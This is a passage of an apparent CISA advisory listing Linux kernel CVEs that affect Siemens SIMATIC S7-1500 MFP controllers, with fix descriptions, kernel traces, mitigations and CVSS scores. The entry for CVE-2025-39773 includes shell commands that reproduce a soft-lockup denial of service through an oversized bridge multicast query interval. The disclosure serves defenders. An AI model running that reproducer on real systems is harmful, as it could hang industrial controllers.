<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-39770</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: net: gso: Forbid IPv6 TSO with extensions on devices with only IPV6_CSUM When performing Generic Segmentation Offload (GSO) on an IPv6 packet that contains extension headers, the kernel incorrectly requests checksum offload if the egress device only advertises NETIF_F_IPV6_CSUM feature, which has a strict contract: it supports checksum offload only for plain TCP or UDP over IPv6 and explicitly does not support packets with extension headers. The current GSO logic violates this contract by failing to disable the feature for packets with extension headers, such as those used in GREoIPv6 tunnels. This violation results in the device being asked to perform an operation it cannot support, leading to a `skb_warn_bad_offload` warning and a collapse of network throughput. While device TSO/USO is correctly bypassed in favor of software GSO for these packets, the GSO stack must be explicitly told not to request checksum offload. Mask NETIF_F_IPV6_CSUM, NETIF_F_TSO6 and NETIF_F_GSO_UDP_L4 in gso_features_check if the IPv6 header contains extension headers to compute checksum in software. The exception is a BIG TCP extension, which, as stated in commit 68e068cabd2c6c53 ("net: reenable NETIF_F_IPV6_CSUM offload for BIG TCP packets"): "The feature is only enabled on devices that support BIG TCP TSO. The header is only present for PF_PACKET taps like tcpdump, and not transmitted by physical devices." kernel log output (truncated): WARNING: CPU: 1 PID: 5273 at net/core/dev.c:3535 skb_warn_bad_offload+0x81/0x140 ... Call Trace: skb_checksum_help+0x12a/0x1f0 validate_xmit_skb+0x1a3/0x2d0 validate_xmit_skb_list+0x4f/0x80 sch_direct_xmit+0x1a2/0x380 __dev_xmit_skb+0x242/0x670 __dev_queue_xmit+0x3fc/0x7f0 ip6_finish_output2+0x25e/0x5d0 ip6_finish_output+0x1fc/0x3f0 ip6_tnl_xmit+0x608/0xc00 [ip6_tunnel] ip6gre_tunnel_xmit+0x1c0/0x390 [ip6_gre] dev_hard_start_xmit+0x63/0x1c0 __dev_queue_xmit+0x6d0/0x7f0 ip6_finish_output2+0x214/0x5d0 ip6_finish_output+0x1fc/0x3f0 ip6_xmit+0x2ca/0x6f0 ip6_finish_output+0x1fc/0x3f0 ip6_xmit+0x2ca/0x6f0 inet6_csk_xmit+0xeb/0x150 __tcp_transmit_skb+0x555/0xa80 tcp_write_xmit+0x32a/0xe90 tcp_sendmsg_locked+0x437/0x1110 tcp_sendmsg+0x2f/0x50 ... skb linear: 00000000: e4 3d 1a 7d ec 30 e4 3d 1a 7e 5d 90 86 dd 60 0e skb linear: 00000010: 00 0a 1b 34 3c 40 20 11 00 00 00 00 00 00 00 00 skb linear: 00000020: 00 00 00 00 00 12 20 11 00 00 00 00 00 00 00 00 skb linear: 00000030: 00 00 00 00 00 11 2f 00 04 01 04 01 01 00 00 00 skb linear: 00000040: 86 dd 60 0e 00 0a 1b 00 06 40 20 23 00 00 00 00 skb linear: 00000050: 00 00 00 00 00 00 00 00 00 12 20 23 00 00 00 00 skb linear: 00000060: 00 00 00 00 00 00 00 00 00 11 bf 96 14 51 13 f9 skb linear: 00000070: ae 27 a0 a8 2b e3 80 18 00 40 5b 6f 00 00 01 01 skb linear: 00000080: 08 0a 42 d4 50 d5 4b 70 f8 1a</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-39770">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/573.html">CWE-573 Improper Following of Specification by Caller</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-39773</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: net: bridge: fix soft lockup in br_multicast_query_expired() When set multicast_query_interval to a large value, the local variable 'time' in br_multicast_send_query() may overflow. If the time is smaller than jiffies, the timer will expire immediately, and then call mod_timer() again, which creates a loop and may trigger the following soft lockup issue. watchdog: BUG: soft lockup - CPU#1 stuck for 221s! [rb_consumer:66] CPU: 1 UID: 0 PID: 66 Comm: rb_consumer Not tainted 6.16.0+ #259 PREEMPT(none) Call Trace: __netdev_alloc_skb+0x2e/0x3a0 br_ip6_multicast_alloc_query+0x212/0x1b70 __br_multicast_send_query+0x376/0xac0 br_multicast_send_query+0x299/0x510 br_multicast_query_expired.constprop.0+0x16d/0x1b0 call_timer_fn+0x3b/0x2a0 __run_timers+0x619/0x950 run_timer_softirq+0x11c/0x220 handle_softirqs+0x18e/0x560 __irq_exit_rcu+0x158/0x1a0 sysvec_apic_timer_interrupt+0x76/0x90 This issue can be reproduced with: ip link add br0 type bridge echo 1 &gt; /sys/class/net/br0/bridge/multicast_querier echo 0xffffffffffffffff &gt; /sys/class/net/br0/bridge/multicast_query_interval ip link set dev br0 up The multicast_startup_query_interval can also cause this issue. Similar to the commit 99b40610956a ("net: bridge: mcast: add and enforce query interval minimum"), add check for the query interval maximum to fix this issue.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-39773">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/667.html">CWE-667 Improper Locking</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-39782</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: jbd2: prevent softlockup in jbd2_log_do_checkpoint() Both jbd2_log_do_checkpoint() and jbd2_journal_shrink_checkpoint_list() periodically release j_list_lock after processing a batch of buffers to avoid long hold times on the j_list_lock. However, since both functions contend for j_list_lock, the combined time spent waiting and processing can be significant. jbd2_journal_shrink_checkpoint_list() explicitly calls cond_resched() when need_resched() is true to avoid softlockups during prolonged operations. But jbd2_log_do_checkpoint() only exits its loop when need_resched() is true, relying on potentially sleeping functions like __flush_batch() or wait_on_buffer() to trigger rescheduling. If those functions do not sleep, the kernel may hit a softlockup. watchdog: BUG: soft lockup - CPU#3 stuck for 156s! [kworker/u129:2:373] CPU: 3 PID: 373 Comm: kworker/u129:2 Kdump: loaded Not tainted 6.6.0+ #10 Hardware name: Huawei TaiShan 2280 /BC11SPCD, BIOS 1.27 06/13/2017 Workqueue: writeback wb_workfn (flush-7:2) pstate: 20000005 (nzCv daif -PAN -UAO -TCO -DIT -SSBS BTYPE=--) pc : native_queued_spin_lock_slowpath+0x358/0x418 lr : jbd2_log_do_checkpoint+0x31c/0x438 [jbd2] Call trace: native_queued_spin_lock_slowpath+0x358/0x418 jbd2_log_do_checkpoint+0x31c/0x438 [jbd2] __jbd2_log_wait_for_space+0xfc/0x2f8 [jbd2] add_transaction_credits+0x3bc/0x418 [jbd2] start_this_handle+0xf8/0x560 [jbd2] jbd2__journal_start+0x118/0x228 [jbd2] __ext4_journal_start_sb+0x110/0x188 [ext4] ext4_do_writepages+0x3dc/0x740 [ext4] ext4_writepages+0xa4/0x190 [ext4] do_writepages+0x94/0x228 __writeback_single_inode+0x48/0x318 writeback_sb_inodes+0x204/0x590 __writeback_inodes_wb+0x54/0xf8 wb_writeback+0x2cc/0x3d8 wb_do_writeback+0x2e0/0x2f8 wb_workfn+0x80/0x2a8 process_one_work+0x178/0x3e8 worker_thread+0x234/0x3b8 kthread+0xf0/0x108 ret_from_fork+0x10/0x20 So explicitly call cond_resched() in jbd2_log_do_checkpoint() to avoid softlockup.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-39782">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-39795</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: block: avoid possible overflow for chunk_sectors check in blk_stack_limits() In blk_stack_limits(), we check that the t-&gt;chunk_sectors value is a multiple of the t-&gt;physical_block_size value. However, by finding the chunk_sectors value in bytes, we may overflow the unsigned int which holds chunk_sectors, so change the check to be based on sectors.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-39795">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/674.html">CWE-674 Uncontrolled Recursion</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-39826</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: net: rose: convert 'use' field to refcount_t The 'use' field in struct rose_neigh is used as a reference counter but lacks atomicity. This can lead to race conditions where a rose_neigh structure is freed while still being referenced by other code paths. For example, when rose_neigh-&gt;use becomes zero during an ioctl operation via rose_rt_ioctl(), the structure may be removed while its timer is still active, potentially causing use-after-free issues. This patch changes the type of 'use' from unsigned short to refcount_t and updates all code paths to use rose_neigh_hold() and rose_neigh_put() which operate reference counts atomically.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-39826">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-39827</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: net: rose: include node references in rose_neigh refcount Current implementation maintains two separate reference counting mechanisms: the 'count' field in struct rose_neigh tracks references from rose_node structures, while the 'use' field (now refcount_t) tracks references from rose_sock. This patch merges these two reference counting systems using 'use' field for proper reference management. Specifically, this patch adds incrementing and decrementing of rose_neigh-&gt;use when rose_neigh-&gt;count is incremented or decremented. This patch also modifies rose_rt_free(), rose_rt_device_down() and rose_clear_route() to properly release references to rose_neigh objects before freeing a rose_node through rose_remove_node(). These changes ensure rose_neigh structures are properly freed only when all references, including those from rose_node structures, are released. As a result, this resolves a slab-use-after-free issue reported by Syzbot.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-39827">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-39845</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: x86/mm/64: define ARCH_PAGE_TABLE_SYNC_MASK and arch_sync_kernel_mappings() Define ARCH_PAGE_TABLE_SYNC_MASK and arch_sync_kernel_mappings() to ensure page tables are properly synchronized when calling p*d_populate_kernel(). For 5-level paging, synchronization is performed via pgd_populate_kernel(). In 4-level paging, pgd_populate() is a no-op, so synchronization is instead performed at the P4D level via p4d_populate_kernel(). This fixes intermittent boot failures on systems using 4-level paging and a large amount of persistent memory: BUG: unable to handle page fault for address: ffffe70000000034 #PF: supervisor write access in kernel mode #PF: error_code(0x0002) - not-present page PGD 0 P4D 0 Oops: 0002 [#1] SMP NOPTI RIP: 0010:__init_single_page+0x9/0x6d Call Trace: __init_zone_device_page+0x17/0x5d memmap_init_zone_device+0x154/0x1bb pagemap_range+0x2e0/0x40f memremap_pages+0x10b/0x2f0 devm_memremap_pages+0x1e/0x60 dev_dax_probe+0xce/0x2ec [device_dax] dax_bus_probe+0x6d/0xc9 [... snip ...] It also fixes a crash in vmemmap_set_pmd() caused by accessing vmemmap before sync_global_pgds() [1]: BUG: unable to handle page fault for address: ffffeb3ff1200000 #PF: supervisor write access in kernel mode #PF: error_code(0x0002) - not-present page PGD 0 P4D 0 Oops: Oops: 0002 [#1] PREEMPT SMP NOPTI Tainted: [W]=WARN RIP: 0010:vmemmap_set_pmd+0xff/0x230 vmemmap_populate_hugepages+0x176/0x180 vmemmap_populate+0x34/0x80 __populate_section_memmap+0x41/0x90 sparse_add_section+0x121/0x3e0 __add_pages+0xba/0x150 add_pages+0x1d/0x70 memremap_pages+0x3dc/0x810 devm_memremap_pages+0x1c/0x60 xe_devm_add+0x8b/0x100 [xe] xe_tile_init_noalloc+0x6a/0x70 [xe] xe_device_probe+0x48c/0x740 [xe] [... snip ...]</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-39845">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-39866</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: fs: writeback: fix use-after-free in __mark_inode_dirty() An use-after-free issue occurred when __mark_inode_dirty() get the bdi_writeback that was in the progress of switching. CPU: 1 PID: 562 Comm: systemd-random- Not tainted 6.6.56-gb4403bd46a8e #1 ...... pstate: 60400005 (nZCv daif +PAN -UAO -TCO -DIT -SSBS BTYPE=--) pc : __mark_inode_dirty+0x124/0x418 lr : __mark_inode_dirty+0x118/0x418 sp : ffffffc08c9dbbc0 ........ Call trace: __mark_inode_dirty+0x124/0x418 generic_update_time+0x4c/0x60 file_modified+0xcc/0xd0 ext4_buffered_write_iter+0x58/0x124 ext4_file_write_iter+0x54/0x704 vfs_write+0x1c0/0x308 ksys_write+0x74/0x10c __arm64_sys_write+0x1c/0x28 invoke_syscall+0x48/0x114 el0_svc_common.constprop.0+0xc0/0xe0 do_el0_svc+0x1c/0x28 el0_svc+0x40/0xe4 el0t_64_sync_handler+0x120/0x12c el0t_64_sync+0x194/0x198 Root cause is: systemd-random-seed kworker ---------------------------------------------------------------------- ___mark_inode_dirty inode_switch_wbs_work_fn spin_lock(&amp;inode-&gt;i_lock); inode_attach_wb locked_inode_to_wb_and_lock_list get inode-&gt;i_wb spin_unlock(&amp;inode-&gt;i_lock); spin_lock(&amp;wb-&gt;list_lock) spin_lock(&amp;inode-&gt;i_lock) inode_io_list_move_locked spin_unlock(&amp;wb-&gt;list_lock) spin_unlock(&amp;inode-&gt;i_lock) spin_lock(&amp;old_wb-&gt;list_lock) inode_do_switch_wbs spin_lock(&amp;inode-&gt;i_lock) inode-&gt;i_wb = new_wb spin_unlock(&amp;inode-&gt;i_lock) spin_unlock(&amp;old_wb-&gt;list_lock) wb_put_many(old_wb, nr_switched) cgwb_release old wb released wb_wakeup_delayed() accesses wb, then trigger the use-after-free issue Fix this race condition by holding inode spinlock until wb_wakeup_delayed() finished.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-39866">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
